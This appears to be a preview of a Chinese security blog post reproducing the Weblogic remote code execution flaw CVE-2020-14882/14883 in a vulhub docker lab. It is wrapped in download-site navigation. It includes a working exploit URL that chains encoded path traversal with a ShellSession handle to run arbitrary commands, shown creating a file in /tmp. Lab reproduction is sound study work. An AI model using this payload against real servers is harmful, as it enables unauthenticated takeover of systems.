没有合适的资源?快使用搜索试试~ 我知道了~
资源详情
资源评论
资源推荐
CVE-2020-14882&14883:Weblogic RCE复现
原创 ebounce Timeline Sec
2020-11-27原文
收录于话题
#漏洞复现文章合集
70个
上方蓝色字体关注我们,一起学安全!
作者:ebounce@Timeline Sec
本文字数:3235
阅读时长:9~10min
声明:请勿用作违法用途,否则后果自负
0x01 简介
Weblogic 是 美 国 Oracle 公 司 出 品 的 一 个 Application
Server , 确 切 的 说 是 一 个 基 于 J a v a E E 架 构 的 中 间 件 , W e b l o g i c 是
用于 开 发 、 集 成 、部 署 和 管 理 大 型分 布 式 Web 应 用 、 网 络 应 用 和 数 据
库应用的Java应用服务器。
0x02 漏洞概述
编 号 : C V E - 2 0 2 0 - 1 4 8 8 2 & 1 4 8 8 3
未 经 身 份 验 证 的 远 程 攻 击 者 可 能 通 过 构 造 特 殊 的 G E T 请 求 , 利 用 该 漏
洞在受影响的 Weblogic Se r v e r 上 执 行 任 意 代 码 。
0x03 影响版本
weblogic 10.3.6.0 . 0
weblogic 12.1.3.0 . 0
weblogic 12.2.1.3 . 0
weblogic 12.2.1.4 . 0
weblogic 14.1.1.0 . 0
0x04 环境搭建
省 去 安 装 W e b l o g i c 在 本 地 的 麻 烦 , 我 们 使 用 docke r 环 境 进 行 复 现 , 由
于 前 几 天 P 师 傅 已 经 更 新 了 vulhub 环 境 , 已 经 可 以 直 接 复 现 了 , 但 由
于我 复 现 的 时候 v u l h u b 还 没 有更 新 , 使 用的 是 v u l n h u b / w e b l o g i c,
该 镜 像 现 在 也 更 新 了 ,12.2.1.3-2018
tag的镜像同样可以复现成功。
这里我使用老镜像,因为体积要小很多。
PS:本地物理机搭建的环境同理
sudo docker pull vulhub/weblogic:12.2.1.3-2018
sudo docker run -d -p 7001:7001 -p 8055:8055
vulhub/weblogic:12.2.1.3-2018
启动脚本后,浏览器访问
http://<your_ip>:700 1 / c o n s o l e
正常显示控制台登录界面,即代表安装成 功 。
0x05 漏洞复现
根据网上流传较广的POC:
/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLa
bel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSessio
n(%22java.lang.Runtime.getRuntime().exec(%27执行的命令%27);%22);
我们使用创建文件的命令测试POC:
http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.port
al?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence
.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%2
7touch /tmp/pocIsok%27);%22);
然后页面上会显示404:
然而实际上在docker内部我们执 行 命 令 已 经 成 功 了 :
剩余14页未读,继续阅读
阿葱的葱白
- 粉丝: 26
- 资源: 313
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
- 基于python实现的高考志愿填报参考系统源码+sql数据库(高分毕业设计).zip
- 基于python实现的高考志愿填报参考系统源码+数据库(毕业设计).zip
- 人工智能大赛无人车挑战杯车道线检测python源码.zip
- 基于风控模型的银行客户信用风险评估系统源码+项目说明+数据集(使用jupter notebook).zip
- python基于可变卷积改进的U-Net网络实现对胰腺细胞的精准切割源码(高分项目).zip
- python基于可变卷积改进的U-Net网络实现对胰腺细胞的精准切割源码(高分项目).zip
- 基于javascript实现的蚁群算法(JS代码)
- 基于python实现的随机森林(python代码)
- python读取excel到数据库中,简单的数据库管理脚本
- 7777端口抓包数据集
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
评论0